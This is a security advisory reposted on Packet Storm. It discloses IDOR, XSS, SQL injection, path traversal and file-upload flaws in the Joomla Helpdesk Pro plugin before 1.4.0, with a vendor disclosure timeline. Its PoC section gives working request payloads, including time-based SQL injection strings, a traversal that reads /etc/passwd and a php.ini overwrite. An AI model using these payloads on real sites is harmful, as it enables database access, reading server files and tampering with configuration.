what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Helpdesk Pro XSS / File Disclosure / SQL Injection

Joomla Helpdesk Pro XSS / File Disclosure / SQL Injection
Posted Jul 21, 2015
Authored by Gregor Mynarsky, Kristian Varnai, Simon Rawet

Joomla Helpdesk Pro versions prior to 1.4.0 suffers from cross site scripting, local file disclosure, remote file upload, remote SQL injection, and insecure direct object reference vulnerabilities.

tags | exploit, remote, local, vulnerability, xss, sql injection, file inclusion, file upload
advisories | CVE-2015-4071, CVE-2015-4072, CVE-2015-4073, CVE-2015-4074, CVE-2015-4075
SHA-256 | 9712ee16b62ebd84fa316ca9325157ce4e08bf0486e35985aa2ded84460b3fa7

Joomla Helpdesk Pro XSS / File Disclosure / SQL Injection

Change Mirror Download
Document Title
==============
Joomla! plugin Helpdesk Pro < 1.4.0

Reported By
===========
Simon Rawet from Outpost24
Kristian Varnai from Outpost24
Gregor Mynarsky from Outpost24
https://www.outpost24.com/

For full details, see;
https://www.outpost24.com/outpost24-has-found-critical-vulnerabilities-in-joomla-helpdesk-pro/


Tested on
=========
All exploits were tested and verified by Outpost24 for HelpDesk Pro
version 1.3.0. While no official testing has been done on earlier
versions, all versions prior to 1.4.0, where the issues were finally
patched, are suspected of being vulnerable.

Release Date
============
2015-07-16

CVE
===
CVE-2015-4071 CVSS: 4.0 Direct Object References
CVE-2015-4072 CVSS: 6.5 Multiple XSS
CVE-2015-4073 CVSS: 7.8 SQL Injection
CVE-2015-4074 CVSS: 7.8 Local file disclosure/Path traversal
CVE-2015-4075 CVSS: 6.8 File Upload



Vulnerability Disclosure Timeline:
==================================
2015-05-23: Vulnerabilities discovered and reported to mitre
2015-05-25: Vendor contacted
2015-06-21: Vendor released update version: 1.4.0
2015-07-16: Public disclosure


PoC
===

Direct object references CVE-2015-4071.
Authenticated
Path: http://{target}/component/helpdeskpro/?view=ticket&id={ticketId}

It's possible to read other users' support tickets by changing the
numeric id.


XSS CVE-2015-4072.
Mostly authenticated dependent on site configuration
Output validation is universally overlooked
Example: Name and message
Path:
http://{target}/index.php?option=com_helpdeskpro&view=ticket&layout=form&Itemid=1


SQLi CVE-2015-4073 for both SQLi.

There are 3 SQLi:

Authenticated
Vulnerable parameter: filter_order
Path: http://{url}/index.php?option=com_helpdeskpro&view=tickets
Post data:
search=&category_id=0&status_id=-1&limit=10&limitstart=0&option=com_helpdeskpro&task=&boxchecked=0&filter_order=SLEEP('10')&filter_order_Dir=DESC

Unauthenticated
Vulnerable parameter: ticket_code
Path:
http://{url}/index.php?option=com_helpdeskpro&view=ticket&ticket_code=1"%20or%20sleep(5)%20%23

Unauthenticated
Vulnerable parameter: email
Path: http://{url}/index.php?option=com_helpdeskpro&task=ticket.save
Post data: name=asdf&email=user@example.com"%20and%20sleep(5)%20and%20"3"="3


Local file disclosure/Path traversal CVE-2015-4074.
Unauthenticated
Path:
https://{url}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe


File Upload CVE-2015-4075.
Unauthenticated
Path: http://{url}/index.php?option=com_helpdeskpro&task=language.save
Injected parameter: item, keys, attacker specified
Post data:
lang=&item=./../../../../../../etc/php5/apache2/php&keys[]=[PHP];&[PHP];=val%0aAnyData%0a;
Description: Allows for .ini files to be created wherever the web server
has write access. If the .ini file already exists and is writable, it
will be overwritten by the server. In a poorly configured system, this
will allow for code execution by including applicable arguments in .ini
files. This however is not applicable to most systems. Any non-protected
.ini files will be possible to replace, with impact depending per file.
This PoC will overwrite the file /etc/php5/apache2/php.ini with the content:
;key="val
AnyData
;"

--
Best Regards,
-----------------------------------------------------
Simon Rawet
Web Application Analyst, Outpost24 AB
Skeppsbrokajen 8 | 371 33 Karlskrona | Sweden
T: +46 708 474 323
---Outpost24 - Vulnerability Management Made Easy!---



Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close